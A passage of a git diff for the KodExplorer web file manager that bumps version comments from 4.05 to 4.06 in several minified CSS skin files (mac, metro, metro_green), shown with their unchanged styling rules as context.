#666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.23);box-shadow:0 5px 10px rgba(234,234,234,0.1) inset;} body .header-middle .btn-default:hover{ box-shadow:inset 0 2px 4px rgba(0,0,0,0.1), 0 0 5px rgba(234,234,234,0.15);border-color:rgba(234,234,234,0.15);} body .header-middle .btn-default:active, body .header-middle .btn-default.active{ box-shadow:inset 0 4px 10px rgba(0,0,0,0.4);border-color:rgba(234,234,234,0.23);} body .header-middle .disable .font-icon{ opacity:0.6;filter:alpha(opacity=60);} body .header-middle #yarnball{ border-right-color:transparent;background:none;border:1px solid rgba(234,234,234,0.23);box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .header-middle #yarnball-input input.path{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .header-middle #yarnball-input{ background:none;border:1px solid rgba(234,234,234,0.23);border-right-color:transparent;box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .header-middle #yarnball .yarnball .yarnlet a{ background:none;color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .header-middle #yarnball .yarnball .yarnlet a::after{ content:'/';padding-left:5px;} body .header-middle #yarnball .yarnball .yarnlet a:hover{ color:rgba(234,234,234,0.23);} body .header-middle #yarnball .yarnball .yarnlet a.curDropToPath{ color:#f60;} body .header-middle #yarnball .yarnball .yarnlet a, body .header-middle #yarnball .yarnball .yarnlet a:link, body .header-middle #yarnball .yarnball .yarnlet a:visited{ padding:0px 8px 0px 8px;margin-left:-10px;} body .header-middle #yarnball .yarnball .yarnlet .left-yarn{ background:none;} body .frame-header .header-content .btn-default:active, body .frame-header .header-content .btn-default.active{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.15);} body .file-draging.file-list-icon div.file .filename, body .file-draging.file-list-list div.file .filename, body .file-draging.file-list-split div.file .filename{ visibility:hidden;} body .file-draging.file-list-icon div.file.handle_target .filename, body .file-draging.file-list-list div.file.handle_target .filename, body .file-draging.file-list-split div.file.handle_target .filename{ visibility:visible;} body .file-list-icon .file{ color:#fff;} body .file-list-list .file{ border-bottom:1px solid rgba(234,234,234,0.05);} body .file-list-list .file.file2{ background:rgba(221,221,221,0.02);} body .file-continer .file, body .file-continer .file2{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;text-shadow:0 0 1px #fff;} body .file-continer .file.hover, body .file-continer .file.select-split-parent, body .file-continer .file2.hover, body .file-continer .file2.select-split-parent{ filter:none;background:rgba(234,234,234,0.1);border:1px solid rgba(234,234,234,0.1);} body .file-continer .file.select, body .file-continer .file.file-select-drag-temp, body .file-continer .file2.select, body .file-continer .file2.file-select-drag-temp{ background:rgba(234,234,234,0.16);border:1px solid rgba(234,234,234,0.23);border-bottom:1px solid rgba(234,234,234,0.23);} body .file-list-split .split-box{ border-right:1px solid #e6e6e6;border-right:1px solid rgba(150,150,150,0.15);} body .file-list-split .split-box.split-hover{ background:rgba(5,5,5,0.2);background:rgba(0,0,0,0.01);box-shadow:0 0 100px rgba(5,5,5,0.2) inset;border-bottom-color:rgba(255,255,255,0.2);} body .file-list-split .split-box.split-select{ background:rgba(0,0,0,0.2);background:rgba(0,0,0,0.01);box-shadow:0 0 100px rgba(0,0,0,0.2) inset;border-left:1px solid #eee;border-color:rgba(0,0,0,0.2);margin-left:-1px;border-bottom:5px solid #2196F3;border-bottom-color:rgba(255,255,255,0.4);} body .file-list-split .file .children-open{ background:rgba(255,255,255,0.01);} body .file-list-split .file .children-open i.font-icon{ color:#fff;} body .context-menu-list .context-menu-item.hover{ background:linear-gradient(to right,#44abf6,#2865e2);} body #list-type-header{ background:none;} body #main-title{ background:rgba(234,234,234,0.1);border-bottom:1px solid rgba(234,234,234,0.15);box-shadow:0px 5px 5px rgba(0,0,0,0.05);} body #main-title .this{ background:rgba(234,234,234,0.16);} body #main-title .filename, body #main-title .filesize, body #main-title .filetype, body #main-title .filetime{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;border-right:1px solid rgba(234,234,234,0.23);} body #main-title .filename:hover, body #main-title .filesize:hover, body #main-title .filetype:hover, body #main-title .filetime:hover{ background:rgba(234,234,234,0.16);} body#page-editor .frame-main .tools-left{ background:rgba(234,234,234,0.15);border-bottom:1px solid rgba(234,234,234,0.05);} body#page-editor .frame-main .tools-left a{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body#page-editor .frame-main .frame-right .frame-right-main .frame{ border-left:1px solid rgba(234,234,234,0.05);} body #body .menu-left, body #body .app-menu-left{ background:rgba(230,230,230,0.2);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#480552', endColorstr='#000000');background-image:-webkit-linear-gradient(180deg,#480552,#000000);background-image:-moz-linear-gradient(180deg,#480552,#000000);background-image:-o-linear-gradient(180deg,#480552,#000000);background-image:-ms-linear-gradient(180deg,#480552,#000000);background-image:linear-gradient(180deg,#480552,#000000);-pie-background:linear-gradient(to 180deg,#480552,#000000);background-size:cover;} body #body .menu-left h1, body #body .app-menu-left h1{ color:#fff;font-weight:400;} body #body .menu-left .setting a, body #body .app-menu-left .setting a{ color:#fff;} body #body .menu-left .setting a:hover, body #body .app-menu-left .setting a:hover{ background:rgba(242,242,242,0.2);} body #body .menu-left .setting a.selected, body #body .app-menu-left .setting a.selected{ background:rgba(255,255,255,0.2);border-color:rgba(255,255,255,0.7);color:#fff;} body #body .menu-left .line, body #body .app-menu-left .line{ color:#fff;border-color:#aaa;border-color:rgba(255,255,255,0.3);} body #body .user-list a{ color:#2a6496;} body #body .system-content .left-frame .left-content .ztree li a{ text-shadow:none;} body #body .system-content .left-frame .left-content .ztree li a.hover{ background:#eee;border-color:#eee;} body #body .system-content .left-frame .left-content .ztree li a.curSelectedNode{ background:#63acff;border:1px solid #63acff;} body#page-explorer .task-tab, body#page-editor .task-tab{ background:rgba(255,255,255,0.2);border-color:rgba(255,255,255,0.3);} body .ztree li a{ color:#fff;border-radius:3px;margin:0 4px 0 4px;background:transparent;border-color:transparent;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .ztree li a:hover{ background:rgba(234,234,234,0.15);border-color:transparent;} body .ztree li a span.button.switch{ opacity:0.8;filter:alpha(opacity=80);} body .ztree li a span.button.switch:after{ color:#cccccc;} body .ztree li a span.button.switch.noline_open:after, body .ztree li a span.button.switch.noline_open_hover:after{ color:#e6e6e6;} body .ztree li a.curSelectedNode, body .ztree li a.curDropTreeNode{ background:rgba(234,234,234,0.33);border-color:transparent;} body .ztree li a.curSelectedNode .noline_open:after, body .ztree li a.curSelectedNode .noline_open_hover:after, body .ztree li a.curSelectedNode .noline_close:after, body .ztree li a.curDropTreeNode .noline_open:after, body .ztree li a.curDropTreeNode .noline_open_hover:after, body .ztree li a.curDropTreeNode .noline_close:after{ color:#fff !important;} body .ztree.group-list-tree li a{ color:#444;text-shadow:none;} body.setting-page .ztree li a{ color:inherit;}} -/* ver 4.05(2017-08-26) [build 1503738071.981] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100996.8531] */ \ No newline at end of file diff --git a/static/style/skin/mac.css b/static/style/skin/mac.css index e840d8c..a10d16a 100755 --- a/static/style/skin/mac.css +++ b/static/style/skin/mac.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738071.0251] */ +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100995.9149] */ body{color:#444;position:absolute;top:0px;left:0px;bottom:0px;right:0px;}body .x-folder{background-image:url("../../images/file_icon/icon_others/folder_mac.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_mac.png',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_mac.png',sizingMethod='scale');}body .x-folder.small{background-image:url("../../images/file_icon/icon_others/folder_mac_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_mac_small.png',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_mac_small.png',sizingMethod='scale');width:18px;height:18px;}body .file-continer .x-folder.small{margin-top:-1px;}body .topbar{background:#f1f1f1;}body .topbar .content{border-bottom:1px solid #ddd;}body .topbar .content .topbar-menu{color:#444;border-color:#dddddd;}body .topbar .content .share-title,body .topbar .content .share-info,body .topbar .content .share-info .time{color:#666;}body .topbar .content .top-right div.share-info-user{color:#666;}body .topbar .content .open .topbar-menu,body .topbar .content .topbar-menu:hover,body .topbar .content .topbar-menu.this{background:#e2e2e2;}body .aui-buttons{padding:10px;border-top:1px solid #eee;border-radius:0px 0px 5px 5px;}body .aui-buttons button{margin-left:15px;padding:5px 1.6em;border-radius:3px;height:auto;color:#333;border:solid 1px #ccc;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#dddddd');background-image:-webkit-linear-gradient(top,#fff,#ddd);background-image:-moz-linear-gradient(top,#fff,#ddd);background-image:-o-linear-gradient(top,#fff,#ddd);background-image:-ms-linear-gradient(top,#fff,#ddd);background-image:linear-gradient(top,#fff,#ddd);-pie-background:linear-gradient(to top,#fff,#ddd);text-shadow:0px 1px 1px #ffffff;box-shadow:0 1px 0 rgba(255,255,255,0.7), 0 -1px 0 rgba(0,0,0,0.09);}body .aui-buttons button:focus{outline:none 0;box-shadow:0 0 8px rgba(0,0,0,0.2);}body .aui-buttons button:hover{color:#000;border-color:#aaa;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#dddddd');background-image:-webkit-linear-gradient(top,#fff,#ddd);background-image:-moz-linear-gradient(top,#fff,#ddd);background-image:-o-linear-gradient(top,#fff,#ddd);background-image:-ms-linear-gradient(top,#fff,#ddd);background-image:linear-gradient(top,#fff,#ddd);-pie-background:linear-gradient(to top,#fff,#ddd);}body .aui-buttons button:active{border-color:#aaa;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#dddddd', endColorstr='#ffffff');background-image:-webkit-linear-gradient(top,#ddd,#fff);background-image:-moz-linear-gradient(top,#ddd,#fff);background-image:-o-linear-gradient(top,#ddd,#fff);background-image:-ms-linear-gradient(top,#ddd,#fff);background-image:linear-gradient(top,#ddd,#fff);-pie-background:linear-gradient(to top,#ddd,#fff);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}body .aui-buttons button[disabled]{cursor:default;color:#666;background:#DDD;border:solid 1px #999;opacity:0.5;filter:alpha(opacity=50);box-shadow:none;}body .aui-buttons button::-moz-focus-inner{border:0;padding:0;margin:0;}body .aui-buttons button.aui-state-highlight{color:#fff;border:solid 1px #6091FF;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);text-shadow:-1px -1px 1px #6091FF;}body .aui-buttons button.aui-state-highlight:hover{color:#fff;border-color:#145cff;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);}body .aui-buttons button.aui-state-highlight:active{border-color:#6091FF;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);}body .aui-outer{border-radius:5px;border:1px solid #ccc;-webkit-transition:box-shadow 0.1s;-moz-transition:box-shadow 0.1s;-o-transition:box-shadow 0.1s;-ms-transition:box-shadow 0.1s;transition:box-shadow 0.1s;box-shadow:0 0px 30px rgba(0,0,0,0.2);}body .aui-outer .aui-border{border-radius:5px;}body .aui-outer .aui-header{border-radius:5px 5px 0 0;overflow:hidden;}body .aui-outer .aui-dialog{background:#fff;border-radius:5px;}body .aui-outer .aui-dialog .aui-main{border-radius:5px;}body .aui-title{height:27px;line-height:27px;padding:0 16px 0 0px;color:#aaa;background:#f0f0f0;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f3f3f3', endColorstr='#dddddd');background-image:-webkit-linear-gradient(top,#f3f3f3,#ddd);background-image:-moz-linear-gradient(top,#f3f3f3,#ddd);background-image:-o-linear-gradient(top,#f3f3f3,#ddd);background-image:-ms-linear-gradient(top,#f3f3f3,#ddd);background-image:linear-gradient(top,#f3f3f3,#ddd);-pie-background:linear-gradient(to top,#f3f3f3,#ddd);border-bottom:1px solid #ccc;text-shadow:0 1px 0 #eee;text-align:center;bottom:0px;height:28px;}body .aui-title img{width:18px;}body .aui-state-focus .aui-title{color:#444;}body .aui-state-focus .aui-outer{box-shadow:0 0px 60px rgba(0,0,0,0.4);border:1px solid #b6b6b6;}body .aui-state-lock .aui-outer{box-shadow:0 3px 30px rgba(0,0,0,0.4);}body .aui-min{right:67px;}body .aui-max{right:40px;}body .aui-close{right:13px;}body .aui-min,body .aui-max,body .aui-close{display:block;position:absolute;text-decoration:none;outline:none;cursor:pointer;font-size:1.25em;-webkit-transition:inherit;-moz-transition:inherit;-o-transition:inherit;-ms-transition:inherit;transition:inherit;color:#aaa;top:4px;border:1px solid #bbb;border-radius:10px;height:18px;width:18px;font-size:1em;line-height:18px;text-align:center;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#eeeeee', endColorstr='#bbbbbb');background-image:-webkit-linear-gradient(top,#eee,#bbb);background-image:-moz-linear-gradient(top,#eee,#bbb);background-image:-o-linear-gradient(top,#eee,#bbb);background-image:-ms-linear-gradient(top,#eee,#bbb);background-image:linear-gradient(top,#eee,#bbb);-pie-background:linear-gradient(to top,#eee,#bbb);font-family:FontAwesome;}body .aui-min:hover,body .aui-max:hover,body .aui-close:hover{box-shadow:0 1px 0 rgba(255,255,255,0.3), inset 0 1px 2px rgba(255,255,255,0.3);}body .aui-min:active,body .aui-max:active,body .aui-close:active{box-shadow:none;color:#fff !important;}body .aui-close:hover{border:1px solid #c00;color:#800000;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff1a1a', endColorstr='#cc0000');background-image:-webkit-linear-gradient(top,#ff1a1a,#c00);background-image:-moz-linear-gradient(top,#ff1a1a,#c00);background-image:-o-linear-gradient(top,#ff1a1a,#c00);background-image:-ms-linear-gradient(top,#ff1a1a,#c00);background-image:linear-gradient(top,#ff1a1a,#c00);-pie-background:linear-gradient(to top,#ff1a1a,#c00);}body .aui-min:hover{border:1px solid #EAB11E;color:#ab8010;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f1c964', endColorstr='#eab11e');background-image:-webkit-linear-gradient(top,#f1c964,#EAB11E);background-image:-moz-linear-gradient(top,#f1c964,#EAB11E);background-image:-o-linear-gradient(top,#f1c964,#EAB11E);background-image:-ms-linear-gradient(top,#f1c964,#EAB11E);background-image:linear-gradient(top,#f1c964,#EAB11E);-pie-background:linear-gradient(to top,#f1c964,#EAB11E);}body .aui-max:hover{border:1px solid #169A1B;color:#0c570f;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#20dd27', endColorstr='#169a1b');background-image:-webkit-linear-gradient(top,#20dd27,#169A1B);background-image:-moz-linear-gradient(top,#20dd27,#169A1B);background-image:-o-linear-gradient(top,#20dd27,#169A1B);background-image:-ms-linear-gradient(top,#20dd27,#169A1B);background-image:linear-gradient(top,#20dd27,#169A1B);-pie-background:linear-gradient(to top,#20dd27,#169A1B);}body .aui-max,body .aui-min{display:none;}body div.dialog-simple .aui-title{text-align:left;}body div.dialog-simple .aui-min{right:67px;}body div.dialog-simple .aui-max{right:40px;}body div.dialog-simple .aui-close{right:13px;}body div.dialog-simple .aui-max,body div.dialog-simple .aui-min,body div.dialog-simple .aui-close{background:rgba(255,255,255,0.3);}body .check-version-dialog.dialog-simple .aui-title-bar{margin-top:-120px;}body .dialog-no-title.aui-state-focus .aui-outer,body .dialog-no-title .aui-outer,body .dialog-no-title .aui-inner{border:none;}body#page-desktop .topbar{background:#eee;background-color:rgba(190,190,190,0.3);box-shadow:0 0 10px rgba(0,0,0,0.2);}body#page-desktop .topbar .content{border-bottom:1px solid #ddd;border-bottom-color:transparent;}body#page-desktop .topbar .content .topbar-menu{color:#fff;border-color:rgba(190,190,190,0.1);}body#page-desktop .topbar .content .top-right div.share-info-user{color:#fff;}body#page-desktop .topbar .content .open .topbar-menu,body#page-desktop .topbar .content .topbar-menu:hover,body#page-desktop .topbar .content .topbar-menu.this{background:rgba(255,255,255,0.3);}body#page-desktop .file-list-icon .file .filename{margin-top:6px;line-height:1.7em;padding-top:1px;border-radius:18px;background:rgba(0,0,0,0.15);-webkit-transition:none;-moz-transition:none;-o-transition:none;-ms-transition:none;transition:none;}body#page-desktop .file-list-icon .file .filename .title{display:block;overflow:hidden;white-space:nowrap;}body#page-desktop .file-list-icon .file .filename .textarea{margin-left:-1px;}body#page-desktop .file-list-icon .file.file-icon-edit.select .filename,body#page-desktop .file-list-icon .file.file-icon-edit .filename{background:none;}body#page-desktop .file-list-icon .file.select .filename,body#page-desktop .file-list-icon .file.file-select-drag-temp .filename,body#page-desktop .file-list-icon .file.select.hover .filename{background:rgba(0,0,0,0.2);border:none;margin-left:0px;}body .ztree li a{color:#444;border-radius:3px;margin:0 4px 0 4px;}body .file-list-icon .file{color:#444;}body .file-select{background:#63acff;border-color:transparent;color:#fff;filter:none;}body .file-select .children-open i.font-icon{color:#fff;}body .file-list-list .file,body .file-list-split .file{color:#444;-webkit-transition:all 0.15;-moz-transition:all 0.15;-o-transition:all 0.15;-ms-transition:all 0.15;transition:all 0.15;border-radius:0px;-webkit-transition:all 0.2;-moz-transition:all 0.2;-o-transition:all 0.2;-ms-transition:all 0.2;transition:all 0.2;}body .file-list-list .file.select,body .file-list-list .file.file-select-drag-temp,body .file-list-split .file.select,body .file-list-split .file.file-select-drag-temp{background:#63acff;border-color:transparent;color:#fff;filter:none;border-bottom:1px solid #7dbaff !important;}body .file-list-list .file.select .children-open i.font-icon,body .file-list-list .file.file-select-drag-temp .children-open i.font-icon,body .file-list-split .file.select .children-open i.font-icon,body .file-list-split .file.file-select-drag-temp .children-open i.font-icon{color:#fff;}body .file-list-list .file.select .children-more i.font-icon,body .file-list-list .file.file-select-drag-temp .children-more i.font-icon,body .file-list-split .file.select .children-more i.font-icon,body .file-list-split .file.file-select-drag-temp .children-more i.font-icon{color:#fff !important;}body .file-list-list .file.hover,body .file-list-split .file.hover{background:#c9e2ff;border-color:transparent;}body .file-list-list .file.hover.select,body .file-list-list .file.hover .file-select-drag-temp,body .file-list-split .file.hover.select,body .file-list-split .file.hover .file-select-drag-temp{background:#63acff;border-color:transparent;color:#fff;filter:none;}body .file-list-list .file.hover.select .children-open i.font-icon,body .file-list-list .file.hover .file-select-drag-temp .children-open i.font-icon,body .file-list-split .file.hover.select .children-open i.font-icon,body .file-list-split .file.hover .file-select-drag-temp .children-open i.font-icon{color:#fff;}body .file-list-list .file.file2{background:#f6f6f6;}body .file-list-list .file.file2.hover{background:#e3f0ff;border-color:transparent;}body .file-list-list .file.file2.hover.select,body .file-list-list .file.file2.hover .file-select-drag-temp{background:#63acff;border-color:transparent;color:#fff;filter:none;}body .file-list-list .file.file2.hover.select .children-open i.font-icon,body .file-list-list .file.file2.hover .file-select-drag-temp .children-open i.font-icon{color:#fff;}body .file-list-list .file.file2.select,body .file-list-list .file.file2.file-select-drag-temp{background:#63acff;border-color:transparent;color:#fff;filter:none;}body .file-list-list .file.file2.select .children-open i.font-icon,body .file-list-list .file.file2.file-select-drag-temp .children-open i.font-icon{color:#fff;}body .file-continer .file .item-menu,body .ztree li a .menu-item{border-radius:2px;}body #body .menu-left .setting a:hover{background:#e1efff;}body #body .menu-left .setting a.selected{background:#e1efff;color:#63acff;padding-left:10px;border:none;border-right:5px solid #63acff;} -/* ver 4.05(2017-08-26) [build 1503738071.0251] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100995.9149] */ \ No newline at end of file diff --git a/static/style/skin/metro.css b/static/style/skin/metro.css index 61a3e53..0835e71 100755 --- a/static/style/skin/metro.css +++ b/static/style/skin/metro.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738071.2491] */ +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100996.1282] */ body{position:absolute;top:0px;left:0px;bottom:0px;right:0px;}body .btn-group .btn{border-radius:0px;}body .dropdown-menu{border-radius:0px;}body .dropdown-menu a:hover,body .dropdown-menu .this a{background:#5579BA;color:#fff;}body#page-desktop .topbar{background-color:rgba(85,121,186,0.5);}body#page-desktop .topbar .content .open .topbar-menu,body#page-desktop .topbar .content .topbar-menu:hover,body#page-desktop .topbar .content .topbar-menu.this{background:rgba(85,121,186,0.3);}body .topbar{background:#5579BA;}body .topbar .content .topbar-menu{border-color:#6787c1;}body .topbar .content .open .topbar-menu,body .topbar .content .topbar-menu:hover,body .topbar .content .topbar-menu.this,body .topbar .content .top-right ul a.this{background:#6787c1;border-color:#6787c1;}body .aui-outer{*border:1px solid #5579BA;border:1px solid #5579BA \0/IE9;}body .aui-outer .aui-state-focus .aui-title,body .aui-outer .aui-title{background:#5579BA;}body .aui-outer .aui-buttons button.aui-state-highlight{background:#5579BA;}body .aui-outer .aui-buttons button.aui-state-highlight:hover{background:#6787c1;}body .aui-outer .aui-buttons button.aui-state-highlight:active{background:#8ba4d0;}body .aui-outer .aui-min:hover,body .aui-outer .aui-max:hover{background:#7996c9;}body .aui-outer .aui-min:active,body .aui-outer .aui-max:active{background:#8ba4d0;}body div.dialog-simple .aui-title{border-radius:0;}body .select-container{border:1px solid #223454;background-color:#5579BA;}body .header-middle .btn-left-radius,body .header-middle .btn-right-radius,body .frame-header .header-content .header-right .btn-left-radius,body .frame-header .header-content .header-right .btn-right-radius{border-radius:0;}body .frame-main .frame-left{background:#fafafa;}body .frame-main .frame-left .ztree li a{border-color:transparent;}body .frame-main .frame-left .ztree li a:hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body .frame-main .frame-left .ztree li a.curSelectedNode,body .frame-main .frame-left .ztree li a.curSelectedNode:hover,body .frame-main .frame-left .ztree li a.curDropTreeNode{background:#5579BA;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body .frame-main .frame-left .ztree li a.curSelectedNode .children-open i.font-icon,body .frame-main .frame-left .ztree li a.curSelectedNode:hover .children-open i.font-icon,body .frame-main .frame-left .ztree li a.curDropTreeNode .children-open i.font-icon{color:#fff;}body .frame-main .frame-right .frame-right-main .tools .btn.toolbar-path-more{border-radius:0;}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{color:#3ec3ff !important;}body .file-select{background:#5579BA;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body .file-select .children-open i.font-icon{color:#fff;}body .file-hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer.file-list-split .file.file2{background:none;}body div.file-continer.file-list-split .file.select-split-parent{background:#e3f0ff;}body div.file-continer.file-list-split .file.hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer.file-list-split .file.select.select-split-parent{background:#5579BA;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer.file-list-split .file.select.select-split-parent .children-open i.font-icon{color:#fff;}body div.file-continer .file.file2{background:#fff8e8;}body div.file-continer .file.select,body div.file-continer .file.file-select-drag-temp{background:#5579BA;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.select .children-open i.font-icon,body div.file-continer .file.file-select-drag-temp .children-open i.font-icon{color:#fff;}body div.file-continer .file.hover{background:#ffd987;border-color:transparent;color:#fff;border-radius:0px;color:#444;border-radius:0;filter:none;}body div.file-continer .file.hover.select,body div.file-continer .file.hover.file-select-drag-temp{background:#5579BA;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.hover.select .children-open i.font-icon,body div.file-continer .file.hover.file-select-drag-temp .children-open i.font-icon{color:#fff;}body div.file-continer .file.select.file2,body div.file-continer .file.file-select-drag-temp.file2{background:#5579BA;border-color:transparent;color:#fff;border-radius:0px;filter:none;}body div.file-continer .file.select.file2 .children-open i.font-icon,body div.file-continer .file.file-select-drag-temp.file2 .children-open i.font-icon{color:#fff;}body div.file-continer.file-list-split .file.select,body div.file-continer.file-list-split .file.file-select-drag-temp,body div.file-continer.file-list-list .file.select,body div.file-continer.file-list-list .file.file-select-drag-temp{border-bottom:1px solid #6787c1 !important;}body .context-menu-list{box-shadow:0 10px 40px rgba(0,0,0,0.4);border-radius:0;border:1px solid rgba(0,0,0,0.1);background-clip:padding-box;}body .context-menu-list .context-menu-item{line-height:25px;height:25px;padding:0 15px 0 20px;}body .context-menu-list .context-menu-item.hover,body .context-menu-list .context-menu-item.selected.hover{background:#476caf;}body #body .menu-left,body #body .app-menu-left{background:#476caf;}body #body .menu-left h1,body #body .app-menu-left h1{color:#fff;font-weight:400;}body #body .menu-left .setting a,body #body .app-menu-left .setting a{color:#fff;}body #body .menu-left .setting a:hover,body #body .app-menu-left .setting a:hover{background:#6082be;}body #body .menu-left .setting a.selected,body #body .app-menu-left .setting a.selected{background:#6787c1;border-color:#fff;color:#fff;}body #body .menu-left .line,body #body .app-menu-left .line{color:#fff;border-color:#aaa;border-color:rgba(255,255,255,0.3);}body #body .main .list{border-radius:0;}body #body .main .nav{border-color:#5579BA;}body #body .main .nav a:hover{background:#ddd;color:#5579BA;}body #body .main .nav a.this,body #body .main .nav a.this:hover{background:#5579BA;}body .edit-tab .tabs{border-bottom:1px solid #ddd;}body .edit-tab .tabs .tab{background:#f6f6f6;color:#666;}body .edit-tab .tabs .close{opacity:0.05;filter:alpha(opacity=5);text-shadow:none;color:#fff;}body .edit-tab .tabs .tab.hover{background:#eee;}body .edit-tab .tabs .add{background:#ddd;border:1px solid #eee;color:#666;}body .edit-tab .tabs .tab.this{background:#63acff;border-left:1px solid #63acff;margin-left:-1px;border-right-color:#63acff;}body .edit-tab .tabs .tab.this .close{opacity:0.4;filter:alpha(opacity=40);}body .edit-tab .tabs .tab.hover .close{opacity:0.7;filter:alpha(opacity=70);}body .edit-tab .tabs .edit-changed a.close{opacity:1;filter:alpha(opacity=100);}body .edit-tab .tabs .tab.this.edit-changed a.close{color:#fff;}body .edit-tab .draggable-dragging{background:#f6f6f6;border-left:3px solid #63acff;margin-left:-3px;} -/* ver 4.05(2017-08-26) [build 1503738071.2492] */ \ No newline at end of file +/* ver 4.06(2017-08-30) [build 1504100996.1282] */ \ No newline at end of file diff --git a/static/style/skin/metro_green.css b/static/style/skin/metro_green.css index 44cc076..ffcab51 100755 --- a/static/style/skin/metro_green.css +++ b/static/style/skin/metro_green.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738071.2935] */ +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100996.1836] */ body{position:absolute;top:0px;left:0px;bottom:0px;right:0px;}body .btn-group .btn{border-radius:0px;}body .dropdown-menu{border-radius:0px;}body .dropdown-menu a:hover,body .dropdown-menu .this a{background:#0EA460;color:#fff;}body#page-desktop .topbar{background-color:rgba(14,164,96,0.5);}body#page-desktop .topbar .content .open .topbar-menu,body#page-desktop .topbar .content .topbar-menu:hover,body#page-desktop .topbar .content .topbar-menu.this{background:rgba(14,164,96,0.3);}body .topbar{background:#0EA460;}body .topbar .content .topbar-menu{border-color:#10bb6e;}body .topbar .content .open .topbar-menu,body .topbar .content .topbar-menu:hover,body .topbar .content .topbar-menu.this,body .topbar .content .top-right ul a.this{background:#10bb6e;border-color:#10bb6e;}body .aui-outer{*border:1px solid #0EA460;border:1px solid #0EA460 \0/IE9;}body .aui-outer .aui-state-focus .aui-title,body .aui-outer .aui-title{background:#0EA460;}body .aui-outer .aui-buttons button.aui-state-highlight{background:#0EA460;}body .aui-outer .aui-buttons button.aui-state-highlight:hover{background:#10bb6e;}body .aui-outer .aui-buttons button.aui-state-highlight:active{background:#14ea89;}body .aui-outer .aui-min:hover,body .aui-outer .aui-max:hover{background:#12d37c;}body .aui-outer .aui-min:active,body .aui-outer .aui-max:active{background:#14ea89;}body div.dialog-simple .aui-title{border-radius:0;}body .select-container{border:1px solid #02170d;background-color:#0EA460;}body .header-middle .btn-left-radius,body .header-middle .btn-right-radius,body .frame-header .header-content .header-right .btn-left-radius,body .frame-header .header-content .header-right .btn-right-radius{border-radius:0;}body .frame-main .frame-left{background:#fafafa;}body .frame-main .frame-left .ztree li a{border-color:transparent;}body .frame-main .frame-left .ztree li 